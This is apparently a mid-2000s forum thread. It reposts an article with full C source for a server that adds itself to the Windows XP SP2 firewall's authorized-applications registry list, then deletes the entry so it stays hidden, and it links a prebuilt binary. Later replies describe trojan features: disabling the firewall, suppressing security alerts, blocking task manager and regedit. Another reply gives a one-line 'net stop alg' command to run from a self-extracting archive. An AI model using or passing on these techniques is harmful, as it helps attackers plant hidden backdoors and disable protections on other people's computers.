SP2 Firewall

[iago]

This article is about how to open up a listening port from Windows XP SP2 without being logged/listed as open:

1.9.2005
Mark Kica
crusoe@alexandria.cc
FEI AI Technical University Kosice   
#Dedicated to Katka H. from Levoca



     How to avoid of detection of server application on Windows XP SP2 firewall

###############################################################################
#Q:How safe is Windows XP SP2 firewall ?
#A:Not very...

This trick use only modification of registry keys.Windows Xp SP2 firewall have
list of allowed program in register which are not blocked.If you add new key
to it,your server (malware or trojane) can run freely.

also server can be invisible in following list 

start->control panel->windows firewall->exceptions


It will become invisible from this list because after you create socket,you can remove registry string value of your server and connection wont be aborted

Other way how to bypass SP2 firewall ,is to create trojan not as server,but
as client.

##################################################################

http://taekwondo-itf.szm.sk/bugg.zip

Test :

#c:\bugg.exe          Server running on port 2001

connect to server with :

#telnet localhost 2001



##################################################################

Our Registry path is

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


and there you can create string value

Value name                    Value           

C:\chat.exe  ........ C:\chat.exe:*:Enabled:chat


NO SPACES!!! in key name etc.  _C:\chat.exe___

#################################################################
Tested on Windows XP 2005 center media edition with integrated SP2

Source code
(server use ezsocket lib)

#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

int main( int argc, char *argv [] )
    {
    char buffer[1024];
    char filename[1024];

    HKEY hKey;
    int i;

    GetModuleFileName(NULL, filename, 1024);

    strcpy(buffer, filename);
    strcat(buffer, ":*:Enabled:");
    strcat(buffer, "bugg");

    RegOpenKeyEx(

       HKEY_LOCAL_MACHINE,
       "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
       0,
       KEY_ALL_ACCESS,
       &hKey);

    RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
   
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick    \n");
    fprintf(stdout, "             This is not trojan                       \n");
    fprintf(stdout, "             Opened port is :2001                      \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca                       \n");


    sleep(3);

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
        return 0;
       

    for (; ; )
        {
        RegDeleteValue(hKey, filename); 
          fd_size = sizeof(struct sockaddr_in);

        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
            {
            perror("accept");
            continue;
            }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sended: Hello World\r\n");
        temp = recv(new_fd, buffer, 1024, 0);
        buffer[temp] = '\0';
        fprintf(stdout, "Recieved: %s\r\n", buffer);
        ezclose_socket(new_fd);
        RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

        if (!strcmp(buffer, "quit"))
            break;
        }


    ezsocket_exit();
   return 0;
    }
 

[Quik]

Thanks, was looking for some information on SP2's firewall recently.

[Joe]

Heh, I wouldn't trust the XP firewall anymore than my headphones, even before this.

[Koga73]

i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off :). And the user can add there own blocks if they want.

[Newby]

Uh, it will not display the message, but I'm guessing that it will still block access.

You should set a loop to detect for that window to pop up, and when it does, find the button that says "unblock" and unblock your program from accessing the internet.

[Sidoh]

i made a trojan, and to prevent the xp sp2 firewall from doing anything... i just blocked the window name "windows security alert" so it wont display that stupid mesasage. Along with that, when the trojan is installed, it disables the firewall, and adds itself to the allowed programs list (registry). The application blocker of my trojan i have set by default to block task manager, msconfig, regedit, and windows security alert. So, once its on, its not ez to get off :). And the user can add there own blocks if they want.

How incredibly annoying.  People who program maliciously suck at life.

[Koga73]

when the window closes, it doenst block it, or permantly allow it. Just allows it that time, and next time itll ask u again.

[Joe]

Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.

[Screenor]

Koga, waste your time on something better. The Windows firewall doesn't do anything even if you leave it alone.

Seriously, other then not letting you host games on B.net it's really got no purpose.

[iago]

It blocks incoming traffic.  That will stop a lot of attacks, such as:
MS03-026 (Dcom -- Blaster worm)
MS04-011 (Lsass -- Sasser worm)
MS05-039 (PnP -- Zotob worm)
and many others. 

It's useful for preventing incoming attcks, like worms, but isn't terribly useful for blocking outbound traffic. 

[drka]

Windows Vista is supposed to have its firewall upgraded so that it does

[Quik]

Windows Vista is supposed to have its firewall upgraded so that it does

It does what? A dance? Blocks Sasser? Damn, it better.

[drka]

blocking outgoing connections and maybe will fix the issue where malware can disable it

[iago]

blocking outgoing connections and maybe will fix the issue where malware can disable it

As long as the user can disable it without a password, so can viruses.  And people don't like having to put in a password, so that probably won't change. 

[ink]

XP firewall is easily disabled w/ a archivirus (sfx scripting)
all you have to do is set it to run this before extraction:

C:\Windows\system32\net.exe stop alg

This command will shutdown the "Application Layer Gateway Service" which is responsibly for correct functionality of the firewall.